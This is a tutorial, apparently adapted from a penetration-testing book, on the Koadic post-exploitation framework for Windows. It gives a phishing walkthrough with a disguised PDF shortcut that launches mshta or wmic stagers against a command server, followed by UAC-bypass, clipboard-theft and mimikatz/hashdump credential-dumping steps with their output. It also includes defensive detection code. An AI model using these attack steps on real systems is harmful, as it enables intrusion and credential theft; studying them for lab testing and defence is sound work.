
What Is the Koadic Postexploitation Framework?

Koadic is a tool for penetration testing or internal vulnerability testing in your own Windows network.

 

The developers describe it as a command and control post-exploitation rootkit that uses either Windows Script Host, which is a COM-based runtime environment, or VBScript modules for its numerous attacks. It can be used for operating systems from Windows 2000 to Windows 10.

 

As is common with other postexploitation frameworks, Koadic requires a client-server environment that’s structured in a modular way. Those who have already used Metasploit or Empire will already know the procedure.

 

Installing the Server

You have two options to install Koadic. If you use the current version of Kali Linux, you can install Koadic directly via sudo apt install koadic. Alternatively, you can use the GitHub repository to install the latest version directly. To do this, you must run the following commands in the Linux terminal:

 

cd /opt

git clone https://github.com/zerosum0x0/koadic.git

cd koadic

pip3 install -r requirements.txt

 

This way, you clone the repository to the /opt/koadic folder and then install the necessary dependencies via the Pip Python package manager.

 

If everything went through without any problem, a very spartan interface starts, showing the installed version and the number of modules present:

 

./koadic

   ~[ Version: 0xB ]~

   ~[ Stagers: 6 ]~

   ~[ Implants: 46 ]~

   (koadic: sta/js/mshta)#

 

In the following sections, we assume that you use Koadic on Kali Linux. You need to adjust the sample paths as necessary. First, you should look at the autorun.example file in the Koadic directory. To do this, exit the server using the exit command and call the file with your favorite text editor:

 

set SRVPORT 9001

set ENDPOINT test123 # this will be the URL: /test123

run

 

This configuration file contains commands that are executed at program start, which is where the important parameters are set. In the example, the server port and the ENDPOINT URL have already been stored. Of course, you must adapt these to your test environment. You can find comprehensive documentation on the project website.

 

Very important parameters include, for example, CERTPATH and KEYPATH, which are used to include certificates for an encrypted connection between clients and server. You can call this configuration file with the --autorun parameter at Koadic program startup. However, for a first test you can also use the sample file. To do this, copy this file to autorun.cfg, for example, and start the server with the parameters set there:

 

(koadic: sta/js/mshta)# set SRVPORT 9001
   [+] SRVPORT => 9001
(koadic: sta/js/mshta)# set ENDPOINT test123
   [+] ENDPOINT => test123

(koadic: sta/js/mshta)# run
   [+] Spawned a stager at http://192.168.171.105:9001/test123
   [!] Don't edit this URL! (See: 'help portfwd')
   [>] mshta http://192.168.171.105:9001/test123

(koadic: sta/js/mshta)#

 

As indicated in the warning, you shouldn’t change the URL now. This is the only way to ensure that clients can reach the server without problems.
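To make the autorun format concrete, here is an added example (not code from the book or from the Koadic project) that parses the set KEY VALUE / run lines shown above and reports what a tester should check before starting the server: whether CERTPATH and KEYPATH are set for an encrypted connection, whether SRVPORT is a valid port, and whether a run command is present. The sample file is constructed, and the checks are our assumptions, not Koadic's own validation.

```python
from typing import Dict, List, Tuple

# Constructed autorun file modelled on the autorun.example shown above
SAMPLE_AUTORUN = """\
# Koadic autorun: lines are executed one by one at startup
set SRVPORT 9001
set ENDPOINT test123 # this will be the URL: /test123
run
"""

# Settings the page names as needed for an encrypted client/server connection
REQUIRED_FOR_TLS = ("CERTPATH", "KEYPATH")


def parse_autorun(text: str) -> Tuple[Dict[str, str], List[str]]:
    """Return (settings, commands) from an autorun file.

    '#' starts a comment; 'set KEY VALUE' records a setting; any other
    non-empty line (run, use ...) is kept as a command in file order."""
    settings: Dict[str, str] = {}
    commands: List[str] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 2)
        if parts[0].lower() == "set" and len(parts) == 3:
            settings[parts[1].upper()] = parts[2].strip()
        else:
            commands.append(line)
    return settings, commands


def lint_autorun(text: str) -> List[str]:
    """Warnings a tester would want before starting the server in a lab."""
    settings, commands = parse_autorun(text)
    warnings: List[str] = []
    missing = [key for key in REQUIRED_FOR_TLS if key not in settings]
    if missing:
        warnings.append("no %s set: stager traffic will be plain HTTP" % "/".join(missing))
    port = settings.get("SRVPORT")
    if port is not None and not (port.isdigit() and 1 <= int(port) <= 65535):
        warnings.append("SRVPORT %r is not a valid TCP port" % port)
    if "run" not in [cmd.lower() for cmd in commands]:
        warnings.append("no 'run' command: the stager will not be started")
    return warnings


if __name__ == "__main__":
    for warning in lint_autorun(SAMPLE_AUTORUN):
        print("[!]", warning)
```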

 

Using Helper Tools in the Program

Before we present the other capabilities of Koadic, we want to describe some basic “helper tools” in the program. The help command provides tips everywhere in the environment regarding which commands can be used in the respective segment. Command-line completion via the Tab key helps you find your way around the environment and select possible parameters quickly. Pressing Tab at the main prompt, for example, lists the commands available there:

 

(koadic: sta/js/mshta)# <tab key>

 

   ? creds execute help kill options pyexec run sounds use

   api domain exit info listeners portfwd quit sessions taco

   verbose cmdshell edit exploit jobs load previous repeatjobs

   set unset zombies

 

Creating Connections from a Client to the Server

The way a connection is created from the Windows client to the Koadic server is left to the ingenuity of the respective attacker or penetration tester. The general approach is illustrated by the following scenario; the approach corresponds to a classic spear phishing attack (see figure below):

  1. The attacker connects to the remote server via SSH.
  2. The attacker sends an email to the target from a seemingly trusted source.
  3. The file in the attachment is supposedly a PDF document, but it turns out to be a link file and creates a connection to the Koadic server via the link stored there.

Illustration of the Attack

 

So first you need bait to make the connection. To do this, you want to create an Offer.pdf.lnk file. For this purpose, you use a Windows 10 PC and create a shortcut on the desktop.

 

The Bait

 

In the generated file, you need to adjust the listed fields to the following values:

 

Target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "Start-Process mshta http://192.168.171.105:9001/test123"

Start in: %SYSTEMROOT%\system32\WindowsPowershell\v1.0

 

This calls PowerShell, which starts a process that connects to the Koadic server. Here, mshta stands for Microsoft HTML Application host. The big advantage of this attack is that mshta.exe is part of every Windows installation and is signed by Microsoft. It can be used to execute code; in this case, it is given the network address that was displayed when Koadic was started. This is how the connection from the client you are taking over is initiated.

 

Give your bait an enticing name. If you want, you can also set a different file icon. However, the selected icon should also be available later in the target system under the same file name; otherwise, it won’t be displayed there.

 

That’s all there is to it! You can now copy the link files to any target system in your test environment and test whether a connection to the server is established when they’re called.

 

Virus Protection and Obfuscate: Some antivirus programs have already registered Koadic as malware and included appropriate signatures. The developers are trying to counteract this and have introduced the obfuscate parameter for this purpose, which you may have noticed in the configuration file. Over time, more ways to hide the payload from these programs should be added. In the end, it will become a game of cat and mouse, in which sometimes one side and sometimes the other will gain the upper hand.

 

Creating a First Connection: Zombie 0

Once you run the link file on a target system, the incoming connection is displayed as a zombie on the Koadic server. Numbering starts at zero. The zombies command can then be used to display more information about the source IP address and the status of the connection; a zombie thus corresponds to a session in other frameworks:

 

[+] Zombie 0: Staging new connection (192.168.171.166)

[+] Zombie 0: WIN10PC\John @ WIN10PC -- Windows 10 Pro

(koadic: sta/js/mshta)# zombies

 

ID          IP                    STATUS    LAST SEEN

---         ---------------       -------   -------------------

0           192.168.171.166       Alive     2019-09-13 16:52:12

 

The Modules of Koadic

As you’ve already seen in the first call of the Koadic server, the modules are divided into stagers and implants. The stagers are primarily used to establish a connection from the client to the server. If no stager is selected, sta/js/mshta is used by default, which is also the most reliable one according to the developers. You can see which stagers are currently running by using the listeners command:

 

(koadic: sta/js/mshta)# listeners

ID          IP                PORT    TYPE
----        ---------------   -----   ---------------
0           192.168.171.105   9001    stager/js/mshta

 

If you want to use other stagers, you should specify them in the configuration file at program startup or select them via the use "Stagername" command. Here too, the run command is used to transfer the selection to the server. For example, if you want to use the Windows Management Instrumentation Command Line, you should enable the wmic stager:

 

(koadic: sta/js/mshta)# use stager/js/wmic
(koadic: sta/js/wmic)# run

   [+] Spawned a stager at http://192.168.171.105:9996/YH0O8.xsl
   [!] Don't edit this URL! (See: 'help portfwd')
   [>] wmic os get /FORMAT:"http://192.168.171.105:9996/YH0O8.xsl"

 

(koadic: sta/js/wmic)# listeners

 

ID          IP                       PORT    TYPE

----        ---------                -----   -------

0           192.168.171.105          9001    stager/js/mshta

1           192.168.171.105          9996    stager/js/wmic
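The two stager invocations shown above (mshta fetching a URL, and wmic loading a remote .xsl through /FORMAT:) and the PowerShell shortcut bait from the earlier section are exactly what a defender can look for in process-creation telemetry. The following Python is an added example, not code from the book or from the Koadic project; it runs over constructed Sysmon-style records (parent image, image and command line separated by '|') and flags those three patterns while leaving local look-alikes alone.

```python
import re
from typing import Dict, List, Optional

# Constructed Sysmon-style process-creation records (not real telemetry).
# Format per record: ParentImage|Image|CommandLine
SAMPLE_EVENTS = [
    r"C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r'powershell.exe "Start-Process mshta http://192.168.171.105:9001/test123"',
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\mshta.exe|"
    r"mshta http://192.168.171.105:9001/test123",
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|"
    r'wmic os get /FORMAT:"http://192.168.171.105:9996/YH0O8.xsl"',
    # benign look-alikes that must not fire: a local .hta and a local wmic format
    r"C:\Windows\explorer.exe|C:\Windows\System32\mshta.exe|"
    r"mshta.exe C:\Program Files\Vendor\setup.hta",
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|"
    r"wmic os get caption /FORMAT:list",
]

REMOTE_URL = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)
# wmic's /FORMAT: switch pointing at an http(s) stylesheet instead of a local one
WMIC_REMOTE_XSL = re.compile(r'/FORMAT:\s*"?https?://[^\s"]+\.xsl', re.IGNORECASE)
PS_START_MSHTA = re.compile(r"start-process\s+mshta", re.IGNORECASE)


def classify(record: str) -> Optional[Dict[str, str]]:
    """Return a finding for one record, or None if no stager pattern matches."""
    parent, image, cmdline = record.split("|", 2)
    exe = image.rsplit("\\", 1)[-1].lower()
    url = REMOTE_URL.search(cmdline)
    if exe == "mshta.exe" and url:
        reason = "mshta loading a remote URL (sta/js/mshta stager)"
    elif exe == "wmic.exe" and WMIC_REMOTE_XSL.search(cmdline):
        reason = "wmic /FORMAT: loading a remote .xsl (sta/js/wmic stager)"
    elif exe == "powershell.exe" and url and PS_START_MSHTA.search(cmdline):
        reason = "PowerShell starting mshta with a URL (shortcut bait)"
    else:
        return None
    return {
        "image": exe,
        "parent": parent.rsplit("\\", 1)[-1].lower(),
        "url": url.group(0) if url else "",
        "reason": reason,
    }


def scan(records: List[str]) -> List[Dict[str, str]]:
    """Run classify() over all records and keep the hits, in log order."""
    return [hit for hit in map(classify, records) if hit is not None]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["parent"], "->", hit["image"], hit["url"], ":", hit["reason"])
```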

 

Implants are most comparable to the post modules in the Empire framework. They are transferred to the target systems via the existing zombie connections to do their work. In this process, when an implant is executed, the Koadic server creates a work order called a job.

 

The individual implants are divided into categories that you use in the various stages of postexploitation. Thus, in the directories you will find modules for elevation, gathering, managing, persistence, pivoting, scanning, and other tools.

 

A brief overview of the various implants can be found on the developers’ GitHub page. However, you can also use the use command and (Tab) to navigate through the menu structure:

 

(koadic: sta/js/wmic)# use implant/[TAB]

 

   elevate/ fun/ gather/ inject/ manage/ persist/

   phish/ pivot/ scan/ util/

 

(koadic: sta/js/wmic)# use implant/gather/[TAB]

 

   clipboard enum_printers enum_users hashdump_sam

   office_key windows_key

 

   enum_domain_info enum_shares hashdump_dc loot_finder

   user_hunter

 

(koadic: sta/js/wmic)# use implant/gather/clipboard

(koadic: imp/gat/clipboard)# info

 

NAME           VALUE          REQ      DESCRIPTION

-----          ----------     ----     -------------

ZOMBIE         ALL            yes      the zombie to target

 

The info command then lists the necessary parameters for the selected module. In this example, the clipboard is to be read from all target systems. The ALL parameter is set by default. However, you can also select only certain zombie connections using the set command. Using run, you finally execute the selected module:

 

(koadic: imp/gat/clipboard)# set ZOMBIE 0

 

   [+] ZOMBIE => 0

 

(koadic: imp/gat/clipboard)# run

 

   [*] Zombie 0: Job 1 (implant/gather/clipboard) created.

   [+] Zombie 0: Job 1 (implant/gather/clipboard) completed.

   Clipboard contents: Secret1234

 

Extending Rights and Reading Password Hashes

Koadic is an incredibly versatile tool that we can’t describe in detail here. However, we would like to explain the general mode of operation by means of a rights escalation and the reading of password hashes or passwords.

 

We assume that the file Offer.pdf.lnk was launched on two PCs with user rights. The first PC runs Windows 7, the second Windows 10. Thus, zombie connections 0 and 1 were created on the Koadic server:

 

(koadic: imp/ele/bypassuac_fodhelper)# zombies

 

ID          IP                STATUS      LAST SEEN

--          ---------------   ------      -------------------

0           192.168.171.166   Alive       2019-09-14 11:05:26

1           192.168.171.230   Alive       2019-09-14 11:05:26

 

You now want to obtain administrator rights on both computers. For this purpose, Koadic provides various modules in the elevate subdirectory. For Windows 10, you can use implant/elevate/bypassuac_fodhelper and get the necessary parameters with the info command:

 

(koadic: sta/js/mshta)# use implant/elevate/bypassuac_fodhelper

(koadic: imp/ele/bypassuac_fodhelper)# info

   NAME       VALUE   REQ   DESCRIPTION
   -----      -----   ---   -------------
   PAYLOAD            yes   run listeners for a list of IDs
   ZOMBIE     ALL     yes   the zombie to target

 

In this context, the term PAYLOAD is a bit confusing: it is the ID of the stager (listener) that Koadic uses for the new connection. You’ve already output the stagers via the listeners command. As a rule, it’s sufficient here to set the value to 0. On the other hand, we do not recommend leaving the parameter for the zombie connection set to ALL; instead, specify the applicable ID in each case.

 

Once you’ve entered everything using set, you can instruct Koadic to run the module using run. This creates a job and outputs further information. If the attack was successful, another zombie should be displayed. The asterisk (*) after the ID indicates that this connection now has administrator rights.

 

Now you can proceed in the same way for the Windows 7 PC. However, here you need the implant/elevate/bypassuac_eventvwr module.

 

With this, you’ll get two new connections:

 

(koadic: imp/ele/bypassuac_eventvwr)# zombies

 

   ID      IP                STATUS     LAST SEEN

   --      ---------------   ------     -------------------

   0       192.168.171.166   Alive      2019-09-14 11:07:07

   1       192.168.171.230   Alive      2019-09-14 11:07:07

   2*      192.168.171.166   Alive      2019-09-14 11:07:07

   3*      192.168.171.230   Alive      2019-09-14 11:07:07

 

Now you’ve fulfilled the requirements to read the passwords or hash values in the target systems. Koadic provides the necessary modules in the gather or inject directories.

 

Use the implant/gather/hashdump_sam module to read password hashes on Windows 10. You can leave the preset parameters and only need to enter the zombie ID. However, make sure that you select the correct connection with administrator rights (2* in the example). Otherwise, the attempt will fail because you do not have sufficient rights.

 

For Windows 7, you must use the implant/inject/mimikatz_dotnet2js module in the same way. This way, with a little luck, you’ll also obtain the login passwords in plain text. The creds command lists the results:

 

Cred ID     IP                USERNAME             DOMAIN       PASSWORD     NTLM
-------     ---------------   ------------------   ----------   ----------   --------------------------------
0           192.168.171.230   John                 WIN7CLIENT   Secret1234   4ceb37c54b65aabf5abd537c6d285123
5           192.168.171.166   WDAGUtilityAccount   WIN10PC                   e3c560b7ff401f8456c69001aa42d979
6           192.168.171.166   Win10PC              WIN10PC                   c02de0449053f00a6df2ff9177f294ca
7           192.168.171.166   John                 WIN10PC                   3ec82c448595c1a415b550e1b0c6ec68

 

Conclusion and Countermeasures

Koadic is a postexploitation framework that is in the early stages of development, but it already comes with many useful modules. It remains to be seen what tricks the developers can incorporate to make it harder for antivirus programs to find the payloads. Because most of the zombie connections are unwanted connections to the internet, a firewall combined with a proxy server equipped with user authentication helps as a countermeasure.

 

Editor’s note: This post has been adapted from a section of the book Hacking and Security: The Comprehensive Guide to Penetration Testing and Cybersecurity by Michael Kofler, Klaus Gebeshuber, Peter Kloep, Frank Neugebauer, André Zingsheim, Thomas Hackner, Markus Widl, Roland Aigner, Stefan Kania, Tobias Scheible, and Matthias Wübbeling.
